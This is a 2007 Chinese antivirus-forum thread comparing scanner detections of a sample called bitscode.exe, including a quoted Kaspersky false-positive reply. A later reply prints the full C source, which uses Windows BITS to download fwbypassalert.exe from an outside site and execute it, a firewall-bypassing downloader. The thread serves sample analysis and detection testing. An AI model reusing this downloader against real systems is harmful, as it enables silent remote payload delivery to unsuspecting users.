查看: 3014|回复: 11
收起左侧

[病毒样本] serious code

[复制链接]
lanvin
发表于 2007-5-16 18:29:44 | 显示全部楼层 |阅读模式

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
lanvin
 楼主| 发表于 2007-5-16 18:30:47 | 显示全部楼层
红伞已经回复是木马,不过现在是过红伞的
下次升级就可以杀了
欠妳緈諨
发表于 2007-5-16 18:30:50 | 显示全部楼层
NOD32和AVAST  MISS
dyw1021
头像被屏蔽
发表于 2007-5-16 18:31:26 | 显示全部楼层
NOD  32。。。。。。。。。。。。。。。。。。。。。。。。。
kfcnknight
发表于 2007-5-16 18:41:55 | 显示全部楼层
不像是有害了的……

[ 本帖最后由 kfcnknight 于 2007-5-16 18:48 编辑 ]
fanrubin
头像被屏蔽
发表于 2007-5-16 18:44:51 | 显示全部楼层
卡6只有在程序运行后报警。而且延迟一会。不过还是报了

[ 本帖最后由 fanrubin 于 2007-5-16 18:56 编辑 ]
gwg829
头像被屏蔽
发表于 2007-5-16 18:46:07 | 显示全部楼层
启发之  KIS  7.99  误报啊 [:27:]


Hello.
No malicious software was found in the attached file.

Please quote all when answering.
-----------------
Regards, Kirill Erakhtin
Virus Analyst, Kaspersky Lab.

Ph.: +7(095) 797-8700
E-mail: newvirus@kaspersky.com
http://www.kaspersky.com   http://www.viruslist.com

http://www.kaspersky.com/virusscanner - free online virus scanner.
http://www.kaspersky.com/helpdesk.html - technical support.
http://www.kaspersky.com/trials - trial version


> Attachment: bitscode.rar

>  Here is a new one , KIS 7.0.0.99 have check it out !
>    please check it again.
>    Thank you
>     
>    Possibly infected: virus Downloader (modification)
>    c:\documents and
settings\gwg\?ÀÃæ\code\bitscode.exe 17.5 KB

[ 本帖最后由 gwg829 于 2007-5-16 21:31 编辑 ]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
uhthn2002
发表于 2007-5-16 18:51:42 | 显示全部楼层
VBA32 MISS
harry_chang2003
头像被屏蔽
发表于 2007-5-16 20:35:45 | 显示全部楼层
PCC Intellitrap啟發式技術報了
solcroft
发表于 2007-5-16 20:52:33 | 显示全部楼层


虽然稍微修改一下URL,便可以下载木马,但这个咚咚完全无害
  1. // This is version 2 of bitscode.exe
  2. // The newer version downloads and starts fwbypassalert.exe in the users temp directory
  3. #define _WIN32_WINNT 0x0400
  4. #define _WIN32_DCOM
  5. #include <stdio.h>
  6. #include <windows.h>
  7. #include <objbase.h>
  8. #include <bits.h>
  9. #pragma hdrstop
  10. #pragma comment(lib, "bits.lib")
  11. #pragma comment(lib, "ole32.lib")
  12. int main()
  13. {
  14.   HRESULT hresult;
  15.   IBackgroundCopyManager * bgcopyman;
  16.   IBackgroundCopyJob * bgcopyjob;
  17.   GUID jobid;
  18.   WCHAR source[]=L"http://www.reconstructer.org/fwbypassalert";
  19.   WCHAR target[MAX_PATH+20]=L"";
  20.   WCHAR jobname[]=L"leeching_job";
  21.   WCHAR tmppath[MAX_PATH];
  22.   char exec[MAX_PATH+20]="";
  23.   GetTempPathW(MAX_PATH,tmppath);
  24.   swprintf(target,L"%s\\fwbypassalert.exe",tmppath);
  25.   WideCharToMultiByte(CP_ACP,0,(const unsigned short*)target,MAX_PATH+20,exec,MAX_PATH+20,NULL,NULL);
  26.   hresult = CoInitializeEx(NULL,COINIT_APARTMENTTHREADED);  
  27.    
  28.   if(SUCCEEDED(hresult))  
  29.   {  
  30.    hresult = CoInitializeSecurity(NULL,-1,NULL,NULL,  
  31.                                  RPC_C_AUTHN_LEVEL_CONNECT,  
  32.                                  RPC_C_IMP_LEVEL_IMPERSONATE,  
  33.                                  NULL,EOAC_NONE,0);  
  34.   }
  35.   else
  36.    return -1;
  37.    
  38.   if(SUCCEEDED(hresult))  
  39.     hresult = CoCreateInstance(CLSID_BackgroundCopyManager,
  40.                               0,  
  41.                               CLSCTX_ALL,  
  42.                               IID_IBackgroundCopyManager,  
  43.                               (LPVOID *)&bgcopyman);     
  44.   else  
  45.         return -1;
  46.   
  47.   if (hresult==S_OK)
  48.   {
  49.     hresult = bgcopyman->CreateJob(jobname,BG_JOB_TYPE_DOWNLOAD,&jobid,&bgcopyjob);
  50.     if (hresult==S_OK)
  51.     {
  52.        hresult = bgcopyjob->AddFile(source,target);
  53.       
  54.        if (hresult==S_OK)
  55.        {
  56.          BG_JOB_STATE state;
  57.          bgcopyjob->Resume();
  58.          
  59.          do
  60.          {
  61.            Sleep(100);
  62.            hresult = bgcopyjob->GetState(&state);
  63.          } while (state!=BG_JOB_STATE_TRANSFERRED);
  64.          
  65.          bgcopyjob->Complete();
  66.          WinExec(exec, SW_SHOW);
  67.        }
  68.        bgcopyjob->Release();
  69.     }
  70.     bgcopyman->Release();
  71.   }
  72.   CoUninitialize();
  73.   return 0;
  74. }
复制代码
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-1-12 09:58 , Processed in 0.136808 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表